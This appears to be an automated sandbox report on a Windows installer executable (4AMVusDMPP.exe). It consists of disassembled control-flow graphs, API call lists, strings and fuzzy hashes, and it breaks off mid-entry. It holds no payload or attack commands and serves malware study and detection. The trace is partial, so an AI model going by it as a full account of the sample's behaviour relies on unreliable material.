                                                          • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                          • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 375 403b53-403b59 lstrcatW 370->375 376 403b3d-403b4e call 4062b6 370->376 375->378 376->375 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 393 403bc2-403bc6 390->393 391->392 395 403cd5-403cdd call 40140b 392->395 396 403c56-403c86 RegisterClassW 392->396 400 403bd8-403be4 lstrlenW 393->400 401 403bc8-403bd5 call 405cea 393->401 408 403ce7-403cf2 call 403dae 395->408 409 403cdf-403ce2 395->409 397 403da4 396->397 398 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 396->398 406 403da6-403dad 397->406 398->395 402 403be6-403bf4 lstrcmpiW 400->402 403 403c0c-403c14 call 405cbd call 4063e8 400->403 401->400 402->403 407 403bf6-403c00 GetFileAttributesW 402->407 403->384 412 403c02-403c04 407->412 413 403c06-403c07 call 405d09 407->413 419 403cf8-403d12 ShowWindow call 406752 408->419 420 403d7b-403d83 call 405523 408->420 409->406 412->403 412->413 413->403 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->409 429 403d91-403d98 call 40140b 425->429 426->397 427->428 432 403d32-403d42 GetClassInfoW RegisterClassW 428->432 433 403d48-403d6b DialogBoxParamW call 40140b 428->433 429->409 432->433 436 403d70-403d79 call 403a28 433->436 436->406
                                                          APIs
                                                            • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                            • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                          • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,774D3420,00435000,00000000), ref: 00403B59
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                            • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                          • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                          • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                          • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-268981469
                                                          • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                          • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                          • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                          • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 459 403187-40318c 452->459 460 4030bc-4030bf 452->460 454 402fd7 453->454 455 402fd9-402fe6 call 403447 453->455 454->455 464 403143-40314b call 402e8e 455->464 465 402fec-402ff2 455->465 459->445 462 4030c1-4030d9 call 40345d call 403447 460->462 463 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 460->463 462->459 488 4030df-4030e5 462->488 490 403139-40313e 463->490 491 40314d-40317d call 40345d call 4031d6 463->491 464->459 468 403072-403076 465->468 469 402ff4-40300c call 405e99 465->469 472 403078-40307e call 402e8e 468->472 473 40307f-403085 468->473 469->473 487 40300e-403015 469->487 472->473 479 403087-403095 call 4068b5 473->479 480 403098-4030a2 473->480 479->480 480->452 480->453 487->473 492 403017-40301e 487->492 488->459 488->463 490->445 500 403182-403185 491->500 492->473 494 403020-403027 492->494 494->473 496 403029-403030 494->496 496->473 498 403032-403052 496->498 498->459 499 403058-40305c 498->499 501 403064-40306c 499->501 502 40305e-403062 499->502 500->459 503 40318e-40319f 500->503 501->473 504 40306e-403070 501->504 502->452 502->501 505 4031a1 503->505 506 4031a7-4031ac 503->506 504->473 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402F44
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4AMVusDMPP.exe,00000400), ref: 00402F60
                                                            • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\4AMVusDMPP.exe,80000000,00000003), ref: 00405EE2
                                                            • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\4AMVusDMPP.exe,C:\Users\user\Desktop\4AMVusDMPP.exe,80000000,00000003), ref: 00402FA9
                                                          • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\4AMVusDMPP.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-4260203894
                                                          • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                          • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                          • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                          • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 511 40640a-406415 512 406417-406426 511->512 513 406428-40643e 511->513 512->513 514 406444-406451 513->514 515 406656-40665c 513->515 514->515 516 406457-40645e 514->516 517 406662-40666d 515->517 518 406463-406470 515->518 516->515 520 406678-406679 517->520 521 40666f-406673 call 4063e8 517->521 518->517 519 406476-406482 518->519 522 406643 519->522 523 406488-4064c6 519->523 521->520 527 406651-406654 522->527 528 406645-40664f 522->528 525 4065e6-4065ea 523->525 526 4064cc-4064d7 523->526 531 4065ec-4065f2 525->531 532 40661d-406621 525->532 529 4064f0 526->529 530 4064d9-4064de 526->530 527->515 528->515 538 4064f7-4064fe 529->538 530->529 535 4064e0-4064e3 530->535 536 406602-40660e call 4063e8 531->536 537 4065f4-406600 call 40632f 531->537 533 406630-406641 lstrlenW 532->533 534 406623-40662b call 40640a 532->534 533->515 534->533 535->529 540 4064e5-4064e8 535->540 545 406613-406619 536->545 537->545 542 406500-406502 538->542 543 406503-406505 538->543 540->529 546 4064ea-4064ee 540->546 542->543 548 406540-406543 543->548 549 406507-40652e call 4062b6 543->549 545->533 551 40661b 545->551 546->538 552 406553-406556 548->552 553 406545-406551 GetSystemDirectoryW 548->553 559 406534-40653b call 40640a 549->559 560 4065ce-4065d1 549->560 555 4065de-4065e4 call 40667c 551->555 557 4065c1-4065c3 552->557 558 406558-406566 GetWindowsDirectoryW 552->558 556 4065c5-4065c9 553->556 555->533 556->555 562 4065cb 556->562 557->556 561 406568-406572 557->561 558->557 559->556 560->555 565 4065d3-4065d9 lstrcatW 560->565 567 406574-406577 561->567 568 40658c-4065a2 SHGetSpecialFolderLocation 561->568 562->560 565->555 567->568 570 406579-406580 567->570 571 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 568->571 572 4065bd 568->572 573 406588-40658a 570->573 571->556 571->572 572->557 573->556 573->568
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                          • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                          • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                          • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-1230650788
                                                          • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                          • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                          • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                          • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 638 40176f-401794 call 402c41 call 405d34 643 401796-40179c call 4063e8 638->643 644 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 638->644 649 4017b5-4017b6 call 40667c 643->649 644->649 653 4017bb-4017bf 649->653 654 4017c1-4017cb call 40672b 653->654 655 4017f2-4017f5 653->655 662 4017dd-4017ef 654->662 663 4017cd-4017db CompareFileTime 654->663 657 4017f7-4017f8 call 405eb9 655->657 658 4017fd-401819 call 405ede 655->658 657->658 665 40181b-40181e 658->665 666 40188d-4018b6 call 405450 call 4031d6 658->666 662->655 663->662 668 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 665->668 669 40186f-401879 call 405450 665->669 679 4018b8-4018bc 666->679 680 4018be-4018ca SetFileTime 666->680 668->653 701 401864-401865 668->701 681 401882-401888 669->681 679->680 683 4018d0-4018db CloseHandle 679->683 680->683 684 402ace 681->684 687 4018e1-4018e4 683->687 688 402ac5-402ac8 683->688 686 402ad0-402ad4 684->686 690 4018e6-4018f7 call 40640a lstrcatW 687->690 691 4018f9-4018fc call 40640a 687->691 688->684 697 401901-4022fc call 405a4e 690->697 691->697 697->686 701->681 703 401867-401868 701->703 703->669
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsc34E8.tmp$C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll$Call
                                                          • API String ID: 1941528284-4035365529
                                                          • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                          • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                          • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                          • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 704 40264a-402663 call 402c1f 707 402ac5-402ac8 704->707 708 402669-402670 704->708 709 402ace-402ad4 707->709 710 402672 708->710 711 402675-402678 708->711 710->711 713 4027dc-4027e4 711->713 714 40267e-40268d call 406348 711->714 713->707 714->713 717 402693 714->717 718 402699-40269d 717->718 719 402732-402735 718->719 720 4026a3-4026be ReadFile 718->720 721 402737-40273a 719->721 722 40274d-40275d call 405f61 719->722 720->713 723 4026c4-4026c9 720->723 721->722 725 40273c-402747 call 405fbf 721->725 722->713 732 40275f 722->732 723->713 724 4026cf-4026dd 723->724 727 4026e3-4026f5 MultiByteToWideChar 724->727 728 402798-4027a4 call 40632f 724->728 725->713 725->722 731 4026f7-4026fa 727->731 727->732 728->709 735 4026fc-402707 731->735 737 402762-402765 732->737 735->737 739 402709-40272e SetFilePointer MultiByteToWideChar 735->739 737->728 738 402767-40276c 737->738 740 4027a9-4027ad 738->740 741 40276e-402773 738->741 739->735 742 402730 739->742 744 4027ca-4027d6 SetFilePointer 740->744 745 4027af-4027b3 740->745 741->740 743 402775-402788 741->743 742->732 743->713 746 40278a-402790 743->746 744->713 747 4027b5-4027b9 745->747 748 4027bb-4027c8 745->748 746->718 749 402796 746->749 747->744 747->748 748->713 749->713
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                            • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                          • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                          • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                          • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 750 406752-406772 GetSystemDirectoryW 751 406774 750->751 752 406776-406778 750->752 751->752 753 406789-40678b 752->753 754 40677a-406783 752->754 756 40678c-4067bf wsprintfW LoadLibraryExW 753->756 754->753 755 406785-406787 754->755 755->756
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                          • wsprintfW.USER32 ref: 004067A4
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME$\
                                                          • API String ID: 2200240437-1946221925
                                                          • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                          • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                          • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                          • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 757 6eab1777-6eab17b6 call 6eab1b5f 761 6eab17bc-6eab17c0 757->761 762 6eab18d6-6eab18d8 757->762 763 6eab17c9-6eab17d6 call 6eab2394 761->763 764 6eab17c2-6eab17c8 call 6eab2352 761->764 769 6eab17d8-6eab17dd 763->769 770 6eab1806-6eab180d 763->770 764->763 773 6eab17f8-6eab17fb 769->773 774 6eab17df-6eab17e0 769->774 771 6eab180f-6eab182b call 6eab2569 call 6eab15b4 call 6eab1272 GlobalFree 770->771 772 6eab182d-6eab1831 770->772 796 6eab1885-6eab1889 771->796 779 6eab187e-6eab1884 call 6eab2569 772->779 780 6eab1833-6eab187c call 6eab15c6 call 6eab2569 772->780 773->770 775 6eab17fd-6eab17fe call 6eab2d37 773->775 777 6eab17e8-6eab17e9 call 6eab2aac 774->777 778 6eab17e2-6eab17e3 774->778 789 6eab1803 775->789 792 6eab17ee 777->792 784 6eab17f0-6eab17f6 call 6eab2724 778->784 785 6eab17e5-6eab17e6 778->785 779->796 780->796 795 6eab1805 784->795 785->770 785->777 789->795 792->789 795->770 800 6eab188b-6eab1899 call 6eab252c 796->800 801 6eab18c6-6eab18cd 796->801 807 6eab189b-6eab189e 800->807 808 6eab18b1-6eab18b8 800->808 801->762 803 6eab18cf-6eab18d0 GlobalFree 801->803 803->762 807->808 809 6eab18a0-6eab18a8 807->809 808->801 810 6eab18ba-6eab18c5 call 6eab153d 808->810 809->808 811 6eab18aa-6eab18ab FreeLibrary 809->811 810->801 811->808
                                                          APIs
                                                            • Part of subcall function 6EAB1B5F: GlobalFree.KERNEL32(?), ref: 6EAB1DB2
                                                            • Part of subcall function 6EAB1B5F: GlobalFree.KERNEL32(?), ref: 6EAB1DB7
                                                            • Part of subcall function 6EAB1B5F: GlobalFree.KERNEL32(?), ref: 6EAB1DBC
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB1825
                                                          • FreeLibrary.KERNEL32(?), ref: 6EAB18AB
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB18D0
                                                            • Part of subcall function 6EAB2352: GlobalAlloc.KERNEL32(00000040,?), ref: 6EAB2383
                                                            • Part of subcall function 6EAB2724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6EAB17F6,00000000), ref: 6EAB27F4
                                                            • Part of subcall function 6EAB15C6: wsprintfW.USER32 ref: 6EAB15F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                          • String ID:
                                                          • API String ID: 3962662361-3916222277
                                                          • Opcode ID: b18107096cb80aa25b99a8bac40d39c77e54ceb00ab1653fcf9417832be8a749
                                                          • Instruction ID: e4770636bf4b95f02aaaa7a37c93a0545b5b2b79677fcfae5818d42c87a07eb6
                                                          • Opcode Fuzzy Hash: b18107096cb80aa25b99a8bac40d39c77e54ceb00ab1653fcf9417832be8a749
                                                          • Instruction Fuzzy Hash: A241D0718003059ADF409FF4D994BE63BACBF16314F1849B5E915AF186DB7888CDCBA8

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 814 4023e4-402415 call 402c41 * 2 call 402cd1 821 402ac5-402ad4 814->821 822 40241b-402425 814->822 824 402427-402434 call 402c41 lstrlenW 822->824 825 402438-40243b 822->825 824->825 828 40243d-40244e call 402c1f 825->828 829 40244f-402452 825->829 828->829 832 402463-402477 RegSetValueExW 829->832 833 402454-40245e call 4031d6 829->833 836 402479 832->836 837 40247c-40255d RegCloseKey 832->837 833->832 836->837 837->821 839 40288b-402892 837->839 839->821
                                                          APIs
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,00000023,00000011,00000002), ref: 0040242F
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,00000000,00000011,00000002), ref: 0040246F
                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc34E8.tmp,00000000,00000011,00000002), ref: 00402557
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
